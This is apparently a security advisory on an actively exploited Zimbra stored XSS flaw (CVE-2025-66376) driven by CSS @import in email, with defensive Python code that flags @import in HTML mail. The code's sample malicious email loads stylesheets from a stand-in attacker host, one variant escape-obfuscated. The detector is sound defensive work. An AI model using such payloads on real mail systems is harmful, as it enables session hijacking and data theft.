CISA has ordered U.S. federal agencies to patch CVE-2025-66376, a high-severity stored cross-site scripting (XSS) flaw in Zimbra Collaboration Suite (ZCS) that is being actively exploited. Attackers abuse CSS @import directives embedded in the HTML of an email to execute arbitrary JavaScript in the recipient's browser when the message is viewed, which can lead to session hijacking and theft of sensitive data.
Initial Access: Malicious Email Ingress (confirmed)
Attackers deliver HTML-based emails carrying crafted Cascading Style Sheets (CSS) @import directives to users of Zimbra Collaboration Suite; the payload does not require the victim to click anything beyond opening the message.
Defender cut points
- Filter inbound HTML email at the gateway, stripping or quarantining messages whose inline styles or style blocks contain CSS @import directives.
- Conduct user awareness training on identifying suspicious email content.
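The following is an added example of the gateway-side check described above; it is illustrative code written for this page, not Zimbra's own sanitizer or any vendor product. It walks an HTML message body with Python's standard-library parser and flags any `<style>` block or `style=` attribute that contains an `@import` directive, resolving CSS backslash escapes (such as `\40` for `@`) first so that a trivially obfuscated directive is not missed. The two email bodies and the `attacker.example` URLs are constructed sample input.

```python
import re
from html.parser import HTMLParser

# Conservative match for an @import at-rule after CSS escapes are resolved.
# Case-insensitive, and tolerant of whitespace between "@" and "import";
# a false positive on odd styling is preferable to a miss at a mail gateway.
_IMPORT_RE = re.compile(r"@\s*import\b", re.IGNORECASE)

# CSS escape: backslash, 1-6 hex digits, optional single trailing whitespace.
_CSS_ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?")


def unescape_css(css: str) -> str:
    """Resolve CSS hex escapes so "\\40import" becomes "@import"."""
    return _CSS_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), css)


class CssImportFinder(HTMLParser):
    """Collects (location, snippet) pairs for every @import found in the body."""

    def __init__(self) -> None:
        super().__init__()
        self._style_buf = None  # accumulates text inside a <style> element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._style_buf = []
        for name, value in attrs:
            # Inline style attributes are a second place CSS can hide.
            if name == "style" and value and _IMPORT_RE.search(unescape_css(value)):
                self.findings.append(("style-attribute", value))

    def handle_data(self, data):
        if self._style_buf is not None:
            self._style_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._style_buf is not None:
            css = "".join(self._style_buf)
            self._style_buf = None
            if _IMPORT_RE.search(unescape_css(css)):
                self.findings.append(("style-element", css.strip()))


def find_css_imports(html_body: str):
    """Return a list of (location, snippet) findings for an HTML email body."""
    parser = CssImportFinder()
    parser.feed(html_body)
    parser.close()
    return parser.findings


def should_quarantine(html_body: str) -> bool:
    """Gateway decision: any @import in styling is enough to hold the message."""
    return bool(find_css_imports(html_body))


# Constructed sample messages (not real captured mail).
BENIGN_EMAIL = """<html><body>
<style>p { color: #333; }</style>
<p style="font-weight:bold">Quarterly report attached.</p>
</body></html>"""

SUSPICIOUS_EMAIL = """<html><body>
<STYLE>
  @import url("https://attacker.example/x.css");
  p { color: #333; }
</STYLE>
<div style="\\40 IMPORT url(https://attacker.example/y.css)">Hello</div>
</body></html>"""


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_EMAIL), ("suspicious", SUSPICIOUS_EMAIL)):
        print(label, "->", "QUARANTINE" if should_quarantine(body) else "deliver")
        for where, snippet in find_css_imports(body):
            print("   ", where, ":", snippet.splitlines()[0])
```

The parser is deliberately lenient about matching and strict about escapes: it resolves the escape before matching rather than searching for the literal string `@import`, since a gateway rule that only greps for the literal is the first thing an attacker tests around. In production this check would sit alongside, not replace, the vendor patch, and a stricter policy would drop `<style>` elements and `@`-rules from inbound mail entirely rather than only flagging `@import`.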